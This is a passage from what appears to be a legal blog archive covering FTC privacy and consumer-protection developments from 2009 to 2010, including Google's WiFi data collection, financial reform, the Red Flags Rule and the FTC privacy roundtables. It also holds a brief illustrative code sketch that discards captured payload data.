Google’s May revelation generated a flurry of media attention (e.g. from the Wall Street Journal and New York Times), and regulatory investigations in the United States, Germany, Canada, Australia, the U.K., South Korea, and elsewhere. Several class-action lawsuits also resulted. 
 
Last week, on October 22, 2010 Google announced on its U.S. website that it has taken steps to improve its privacy practices, including appointing a new director of privacy to oversee both the engineering and product management groups, enhancing its privacy training, and implementing new internal privacy compliance practices.  This announcement, together with Google’s promise to delete the payload data as soon as possible, and assurance that it will not use the data in any product or service, appears to have appeased the FTC. The FTC’s letter did not contain any determination about whether Google’s actions did or did not breach any data privacy laws, nor did it require any remedial action or fines. Australia, in contrast, had concluded in June that Google violated Australia’s privacy laws, and required Google to publicly apologize, to conduct a Privacy Impact Assessment, and regularly consult with the Australian office about data collection. 
 
Google also acknowledged that – contrary to its earlier postings – “in some instances entire emails and URLs were captured, as well as passwords.” While Google’s October 22 posting satisfied the FTC, this revelation caused the U.K. to announce that it is re-opening its investigation into Google's privacy practices.  The U.K. had closed its investigation in July after reviewing sample payload data, concluding that personal data, emails and passwords were not collected.
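The distinction at issue here is between WiFi frame metadata useful for location services (the network name and MAC address) and the "payload" content of users' communications. The sketch below is purely illustrative, with made-up record fields rather than any real capture format, and shows the difference between keeping only the metadata and retaining payload data:

def strip_payload(captured_frames: list[dict]) -> list[dict]:
    """Keep only the metadata useful for WiFi-based location (SSID, MAC address)
    and drop payload content. Field names are hypothetical, not a real capture format."""
    return [{"ssid": f.get("ssid"), "mac": f.get("mac")} for f in captured_frames]

frames = [{"ssid": "HomeNet", "mac": "00:11:22:33:44:55", "payload": b"GET /inbox ..."}]
print(strip_payload(frames))   # payload bytes are discarded; only SSID and MAC remain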

September 27, 2010

Global Privacy Enforcement Authorities Launch Cooperative Network and Website

The United States Federal Trade Commission ("FTC") recently joined forces with privacy authorities from eleven other countries to launch the Global Privacy Enforcement Network ("GPEN"), which aims to promote cross-border information sharing and enforcement of privacy laws. On September 21, 2010, GPEN unveiled its new website, https://www.privacyenforcement.net/, designed to educate the public about the network. The GPEN website, which is supported by the Organization for Economic Co-Operation and Development ("OECD"), provides guidelines and application instructions for government agencies interested in participating in GPEN. It also sets forth GPEN’s action plan and mission of “sharing information about privacy enforcement issues, trends and experiences; participating in relevant training; cooperating on outreach activities; engaging in dialogue with relevant private sector organizations on privacy enforcement and outreach issues; and facilitating effective cross-border privacy enforcement in specific matters by creating a contact list of privacy enforcement authorities interested in bilateral cooperation in cross-border investigations and enforcement matters.”

In his remarks about the network, which was officially launched in March, FTC Chairman Jon Leibowitz stated that “to protect consumers’ privacy in today’s global economy, all of us who work in law enforcement around the world need to cooperate with each other. We at the FTC are looking forward to working closely with our colleagues overseas to make this happen.”

April 22, 2010

Today at the ABA: Expanding the FTC's Role through Financial Reform

The big question being debated at this morning’s session on financial reform legislation and the proposed Consumer Financial Protection Agency/Bureau: how will the legislation impact the FTC’s authority, both in terms of rulemaking and imposition of civil penalties?

In December 2009, the House passed the “Wall Street Reform and Consumer Protection Act of 2009” (HR 4173). An important provision in the bill would strip the FTC of its powers to regulate consumer financial protection -- while also expanding the agency’s powers in two key ways. First, it would give the FTC “APA” rulemaking authority for areas that fall within the FTC’s jurisdiction; second, it would give the agency greater latitude to assess civil penalties for unfair and deceptive practices.

These amendments will surely impact FTC enforcement of online advertising, marketing, privacy, and data security. For instance, violations under the FTC’s expanded authority could trigger civil penalties even in the absence of an FTC order. Civil penalties would be assessed in antitrust cases brought by the FTC that include a consumer protection claim.

In addition, the HR 4173 language that expands the FTC’s authority would impose liability on companies that “substantially assist” in an unlawful act, even if the company does not have direct knowledge or responsibility for the violation. This provision will probably raise some serious concerns for companies currently enjoying a safe harbor under the Communications Decency Act.

Today, FTC rulemaking jurisdiction comes in two flavors – “APA” rulemaking under certain laws as prescribed by Congress, e.g., the Children’s Online Privacy Protection Act, as well as general rulemaking authority under the 1975 Magnuson-Moss Act. Under the latter, the FTC can only regulate “prevalent” unfair and deceptive acts, and must justify that regulation with “substantial evidence.” The key difference between these two types of rulemaking occurs during judicial review; a court can overturn an FTC regulation under Magnuson-Moss if the rule lacks a substantial evidentiary record to support it. In contrast, FTC regulations enacted under the APA rulemaking scheme, such as those implementing COPPA, can only be overturned if the agency was "arbitrary or capricious" in enacting the rule – a much higher standard. As former FTC Chairman Muris explained in his presentation at the panel, Magnuson-Moss gives the FTC authority to act only when a problem occurs often enough to justify a rule, or when a problem has a common cause in a sufficient number of cases.

Current FTC Chairman Jon Leibowitz, supported by President Obama and the Administration, has strongly advocated for an expansion in the FTC’s authority, stating that it is “critical” for the FTC to carry out its mission of protecting consumers. In particular, Leibowitz has argued that the procedural requirements of Magnuson-Moss – such as the requirement that a practice be prevalent before the agency can act – make FTC rulemaking more burdensome than at most other federal agencies. Although the relevant amendments expanding the FTC’s power are missing from the Senate version of the legislation, it is widely expected that these differences will be worked out in conference. Financial reform legislation appears to be on a fast track - earlier today, a Senate panel approved the bill, and both Republicans and Democrats have indicated that passage is likely.

The CFPA would be a new independent federal agency – the composition of which would vary depending on whether you are looking at the House Bill (5 members and a Director for two years) or Senate Bill (5 members). Its enactment would strip the FTC and other federal banking agencies of their federal consumer protection powers under a number of laws, including the Electronic Funds Transfer Act, the Equal Credit Opportunity Act, the Fair Credit Reporting Act, the Fair Debt Collection Practices Act, the Home Mortgage Disclosure Act, the Real Estate Settlement Procedures Act, the Secure and Fair Enforcement for Mortgage Licensing Act, the Truth in Lending Act and the Truth in Savings Act. In short, any product or service that results from or is related to engaging in a financial activity and that is to be used by a consumer “primarily for personal, family or household purposes” will come under the new agency’s purview.

At today’s session, we saw differing viewpoints from both Tim Muris, former FTC Chairman, and Julie Brill, incoming FTC Commissioner, on this current push to expand the FTC’s authority under financial reform legislation.

Former Chairman Muris views the FTC’s current role as important, and he sees FTC rulemaking as relevant in certain areas – e.g., the do-not-call rules. He is concerned about the current proposals to expand the FTC’s authority because the agency often lacks industry-specific knowledge and expertise (I see this most recently in the area of privacy, as the FTC is currently gleaning this knowledge through its Exploring Privacy roundtable series). Muris also thinks the agency’s rulemaking authority under Magnuson-Moss is more than sufficient, as it imposes an obligation on the agency to be clear about its proposed theories while focusing its evidence on key questions. He cites the agency’s recent business opportunity rulemaking as an example of an instance where the FTC initially proposed a broad rule that would have disproportionately impacted both fraudulent and legitimate businesses. The FTC eventually narrowed its proposed business opportunity rule after the public comment process.

On civil penalties, Muris thinks these are important only when a company violates an FTC order or rule. He sees blanket civil penalty authority as a mistake that may have unintended consequences – such as the effect of a penalty on a firm’s stock price. He’s also concerned that the standard of review laid out in the financial reform legislation will return the FTC’s definition of unfairness to its pre-1994 definition, i.e., the Sperry & Hutchinson or "cigarette rule," which defines an unfair practice as one that is injurious to consumers, violates established public policy, or is unethical or unscrupulous. As many know, Congress amended the FTC Act in 1994 to specify that an unfair act or practice is one that causes or is likely to cause substantial injury to consumers that is not reasonably avoidable and is not outweighed by countervailing benefits to consumers or competition.

Providing a counterpoint to Muris’ remarks, FTC Commissioner Julie Brill, speaking “on behalf of herself,” is generally in favor of expanding the FTC’s authority. She sees the FTC as both a law enforcement and regulatory agency. She views civil penalties as just “one of the arrows” in the FTC’s quiver – not to be used in every instance, but as appropriate. As a law enforcer, she does not see the FTC’s request to have civil penalty authority as unusual – since most state AGs already have this type of authority. To view such penalties as “automatic” is particularly misleading to her, since the FTC would only be able to obtain such penalties after judicial review in court. Brill also sees the FTC as a regulatory agency and notes that APA rulemaking is enjoyed by most other federal agencies. In addition, she points out that APA rulemaking under the proposed amendments would also be subject to review by a judge in court. Brill also views civil penalties as helpful in quantifying equitable remedies to compensate consumers for their injury - e.g. disgorgement or restitution for data breach violations.

Taking a broader view of the situation, Brill sees an expansion of the FTC's authority as a way to make the agency's enforcement efforts more effective – which benefits both consumers and competition in the long run. She also feels that consumers want an agency that has the right enforcement tools – not an “emasculated” FTC - and finds it surprising that the issue is even being debated, given the events of the financial meltdown and the current economic recession.

On the subject of FTC regulation, Brill is strongly in favor of an update, noting that rulemaking under Magnuson-Moss can often take 8 to 10 years. She recalls comments she made on the hearing aid rule as an Assistant AG in Vermont in 1992 – rules that have yet to be issued, nearly 20 years later. Her statements suggest that expanded rulemaking authority might give companies in dynamic industries – such as technology – FTC regulation that actually keeps pace with innovation.

The question, of course, is whether such FTC regulation would also preemptively stifle innovation. Companies have started to take note of the recent push to expand the FTC’s power, and it is likely that the topic will continue to be debated fiercely in the coming weeks as financial reform legislation comes to a vote. Some have even expressed concerns that such an expansion of the FTC’s rulemaking authority could impact funding and investment in technology and Internet companies by both Wall Street and Silicon Valley VCs. For more, take a look at this transcript of the Progress & Freedom Foundation’s recent forum entitled “Supersizing the FTC.”

February 26, 2010

FTC Appeals Judge Walton's Decision on Red Flags Rule

Yesterday, February 25, 2010, the Federal Trade Commission filed notice of appeal to the DC Circuit Court of Appeals to attempt to reverse Judge Walton’s ruling late last year that the FTC cannot require practicing lawyers to comply with the Red Flags Rule.  In August 2009, the American Bar Association challenged the applicability of the Red Flags Rule to lawyers, arguing that it would impose a serious burden on law firms.  At that time, the ABA sought an injunction and declaratory judgment finding that lawyers were not covered. The FTC replied that lawyers should be covered because billing practices, such as charging clients on a monthly basis rather than upfront, made them “creditors” under the plain language of the Red Flags Rule. Judge Walton ruled from the bench in late October and issued his Order and Memorandum Opinion in December.  

Continue reading "FTC Appeals Judge Walton's Decision on Red Flags Rule" »

February 24, 2010

FTC Releases Report of Top Consumer Complaints

On February 24, 2010, the Federal Trade Commission (“FTC”) released the “Consumer Sentinel Network Data Book” (“Report”).  This Report includes a listing of the top consumer complaints reported in 2009 to the FTC. 

 

The top ten complaints for 2009 are:

 

Rank   Category                                          No. of Complaints
1      Identity Theft                                    278,078
2      Third Party and Creditor Debt Collection          119,549
3      Internet Services                                 83,067
4      Shop-at-Home and Catalog Sales                    74,581
5      Foreign Money Offers & Counterfeit Check Scams    61,736
6      Internet Auction                                  57,821
7      Credit Cards                                      45,203
8      Prizes, Sweepstakes and Lotteries                 41,763
9      Advance-Fee Loans and Credit Protection/Repair    41,448
10     Banks and Lenders                                 32,443

February 22, 2010

Federal Trade Commission to Host Third Roundtable on Privacy

The Federal Trade Commission (“FTC”) is preparing for the third and final roundtable discussion on privacy.  The first roundtable was held in December 2009 in Washington, DC, to explore the privacy implications of developing technology and business practices that collect and use consumer data.  This event was followed by a second roundtable in Berkeley, CA, in January 2010.  The discussion in Berkeley focused on the benefits and risks created by technology and the privacy implications of social networking, cloud computing, and mobile marketing.

 

The third roundtable will be held on March 17, 2010 in Washington, DC.  At this event, panelists will discuss the collection and use of “sensitive” information.  In preparation for this roundtable, the FTC has requested comments on the following issues:

 

  • How can we best achieve accountability for best practices or standards for commercial handling of consumer data?  Can consumer access to and correction of their data be made cost effective?  Are there specific accountability or enforcement regimes that are particularly effective? 
  • What potential benefits and concerns are raised by emerging business models built around the collection and use of consumer health information?  What, if any, legal protections do consumers expect apply to their personal health information when they conduct online searches, respond to surveys or quizzes, seek medical advice online, participate in chat groups or health networks, or otherwise?
  • Should “sensitive” information be treated or handled differently than other consumer information?  How do we determine what information is “sensitive”?  What standards should apply to the collection and uses of such information?  Should information about children and teenagers be subject to different standards and, if so, what should they be? 

 

For those who cannot join the discussion in person, a live webcast of this conference will be available at the FTC's website.

December 11, 2009

House Passes Financial Industry Reform Bill

On December 11, 2009, the House of Representatives passed a comprehensive financial industry reform bill, H.R. 4173, that would, among other measures, create a new financial oversight agency--the Consumer Financial Protection Agency (CFPA).  The legislation, passed by a vote of 223 to 202, consisted of multiple bills regarding financial industry practices, including portions of H.R. 3126, the Consumer Financial Protection Agency Act.  Under the new legislation, jurisdiction over consumer financial protection regulations, such as the Fair Credit Reporting Act and the Truth in Lending Act, would transfer from the Federal Trade Commission to the CFPA.  The Senate, which introduced similar financial reform draft legislation in November, is still debating how it will address financial industry reform.  More information regarding the financial reform legislation passed by the House can be found here.

December 10, 2009

H.R. 2221--The Data Accountability and Trust Act Passes in the House

On December 8, 2009, the United States House of Representatives passed H.R. 2221, the Data Accountability and Trust Act.  The bill has now been referred to the Senate Committee on Commerce, Science, and Transportation.
 
H.R. 2221 would require an entity that owns or possesses personal consumer information to enact data protection security policies and to notify individuals if a security breach occurs.  The Federal Trade Commission would be required to promulgate rules regarding data breach notification and protection standards.  The bill would also preempt similar state laws.

December 4, 2009

FTC Holds Workshop on Journalism in the Internet Age

On December 1 and 2, the Federal Trade Commission held a workshop -- "How Will Journalism Survive the Internet Age?" -- exploring how the Internet has affected journalism and discussing a wide range of news-organization related issues, such as the economics of journalism in print and online, new business models for journalism online, and the ways in which journalism costs could be reduced while still maintaining quality. 
 
Commentators on this week's workshop have noted that what was not discussed -- notably behavioral advertising and other types of targeted online advertising -- is as important as issues that were discussed.  Future regulation of consumer privacy and behavioral advertising is still unsettled as legislators and regulators debate the scope of potential privacy legislation and new rules or models that will regulate the industry.
 
Further debate on this topic is likely to continue at the Federal Trade Commission's first Privacy Roundtable that will be held on Monday, December 7, at the Federal Trade Commission Conference Center in Washington, D.C.  A live webcast of this conference will be available at the FTC's website. 

November 30, 2009

FTC Senior Staff Appointments

The FTC has announced the appointments of several senior staff at the Commission:
  • Cecelia Prewett as the Director of the Office of Public Affairs.  Ms. Prewett has a background in communications in both the public and private sectors, working for the American Association for Justice, AARP, the State of Illinois, and on Capitol Hill as a communications director to several Members of Congress.
  • Jessica Rich as Deputy Director in the Bureau of Consumer Protection ("BCP").  Ms. Rich was most recently the Acting Associate Director of the Division of Privacy and Identity Protection in the BCP.  She was formerly an Assistant Director in the same division and the Division of Financial Practices, legal advisor to the Director of the BCP, and staff attorney in one of the FTC's consumer fraud divisions.
  • Charles Harwood as Deputy Director in the Bureau of Consumer Protection.  Mr. Harwood previously was the Director of the FTC's Northwest Regional Office in Seattle for 20 years.  Prior to joining the FTC, Mr. Harwood served as a counsel to the U.S. Senate's Committee on Commerce, Science, and Transportation, and the U.S. Department of the Interior's Indian Arts and Crafts Board.
  • Norm Armstrong, Jr. as Deputy Director in the Bureau of Competition.  Mr. Armstrong has served as Acting Deputy Director in the Bureau of Competition, Deputy Assistant Director of the Mergers IV Division, Counsel to the Director, and Liaison to the Department of Defense.
  • Joel Winston as Associate Director of the Division of Financial Practices.  Mr. Winston has previously held several positions within the FTC including Associate Director of two divisions, Assistant Director of a division, and Assistant Deputy Director of the BCP.
  • Maneesha Mithal as Associate Director of the Division of Privacy and Identity Protection.  Ms. Mithal has previously served as Assistant Director of the same division and Assistant Deputy Director of the BCP.
  • Mark Eichorn as Assistant Director of the Division of Privacy and Identity Protection.  Mr. Eichorn has served as an Attorney Advisor to the Chairman and in the Division of Advertising Practices.

November 24, 2009

Consumer Advocates and Pharmacists' Group Request FTC and HHS Investigation of Possible Violation of Health Privacy Rules

The National Community Pharmacists Association (NCPA) and seven consumer advocacy groups have requested that the FTC and the Department of Health and Human Services (HHS) investigate activities by CVS Caremark that may violate HIPAA.  In a letter filed with the FTC and HHS, the organizations alleged that CVS Caremark used health information in violation of health privacy and antitrust laws.  CVS Caremark was created from the 2007 merger of the pharmacy CVS and the pharmacy benefits manager Caremark Corp.  The letter alleges, among other things, that CVS Caremark uses the information it obtains from non-CVS pharmacies through its pharmacy benefits management program to market the CVS mail-order pharmacy and CVS in-store pharmacy programs to those consumers--an inappropriate use of protected health information.
 
CVS Caremark recently settled an action with the FTC regarding its data security practices.
 
Additional coverage of the story is available here.

November 17, 2009

Federal Agencies Release Model Privacy Notice Form

Eight federal regulatory agencies announced the release of a final model privacy notice form.  The model privacy form is designed to help consumers understand how their information is collected and shared by financial institutions.  The model privacy form complies with the requirements for a financial institution to notify consumers of the institution's information sharing practices and provide consumers with an opportunity to opt out of certain practices pursuant to the Gramm-Leach-Bliley (GLB) Act.
 
The model privacy form uses plain language in a user-friendly format.  The agencies have developed a Model Privacy Form - Opt Out and a Model Privacy Form - No Opt Out.
 
The model privacy form was developed by:
  • Board of Governors of the Federal Reserve System;
  • Commodity Futures Trading Commission;
  • Federal Deposit Insurance Corporation;
  • Federal Trade Commission;
  • National Credit Union Administration;
  • Office of the Comptroller of the Currency;
  • Office of Thrift Supervision; and
  • Securities and Exchange Commission
A copy of the GLB Model Privacy Form Rule is available here.

FTC Announces Agenda for First Privacy Roundtable

The FTC has announced the agenda for the first of three privacy roundtables the Commission will host to discuss the privacy challenges posed by current technology and business practices that collect and use consumer data.

On December 7, 2009, at the FTC Conference Center in Washington, DC, panelists will discuss:
  • Benefits and risks of collecting, using, and retaining consumer data;
  • Consumer expectations and disclosures;
  • Online behavioral advertising;
  • Information brokers; and
  • Exploring existing regulatory frameworks
The roundtable will also be available via live webcast.

The FTC has also announced that the second roundtable will be held at the University of California, Berkeley, School of Law on January 28, 2010.

General information about the series of roundtables is available here.

Brill and Ramirez to be Nominated For FTC Commissioners

President Obama has selected Julie Brill and Edith Ramirez to serve on the Federal Trade Commission.  Brill is currently the Senior Deputy Attorney General and Chief of Consumer Protection and Antitrust for the North Carolina Department of Justice, a position she has held since February 2009.  Prior to working with the North Carolina DOJ, Brill was an Assistant Attorney General for the State of Vermont.  Ramirez is currently a partner with the law firm Quinn Emanuel Urquhart Oliver & Hedges, LLP in Los Angeles and focuses her practice on issues including copyright and trademark infringement, antitrust, and unfair competition.  Ramirez has represented companies including Mattel, American Broadcasting Companies, and The Walt Disney Company.
 
If confirmed by the Senate, Brill and Ramirez will fill the two vacant spots on the Commission created when Deborah Majoras left the FTC in March 2008 and Pamela Jones Harbour's term ended this September.  Brill and Ramirez would each serve a seven-year term.
 
Additional information about Brill and Ramirez is available here.

November 12, 2009

CDT Submits Comments for FTC Consumer Privacy Roundtable

The Center for Democracy and Technology (CDT) has submitted comments for the Federal Trade Commission's (FTC) public roundtable discussions exploring the privacy challenges created by current and emerging technology, and business practices that involve the collection and use of consumer data.  The first in this series of FTC roundtable discussions will take place on December 7, 2009.  The CDT has urged the FTC to use these roundtable discussions to create a full set of fair information practice principles (FIPs) for a stronger privacy protection framework.  The CDT also made specific recommendations to improve privacy protection in the 21st century.
  • The FTC should pursue enforcement actions against all businesses involved in unfair privacy practices, not just spyware companies.
  • The FTC should use its subpoena power to acquire information about company privacy practices.    
  • The Commission should encourage Congress to pass general consumer privacy legislation that would allow the FTC to draft its own set of consumer privacy rules to clarify basic privacy expectations and strengthen privacy protection. 
  • The FTC should establish benchmarks and metrics for evaluating company privacy policies, and the Commission should more actively promote the development of privacy-enhancing technology. 
The CDT's full comments can be found here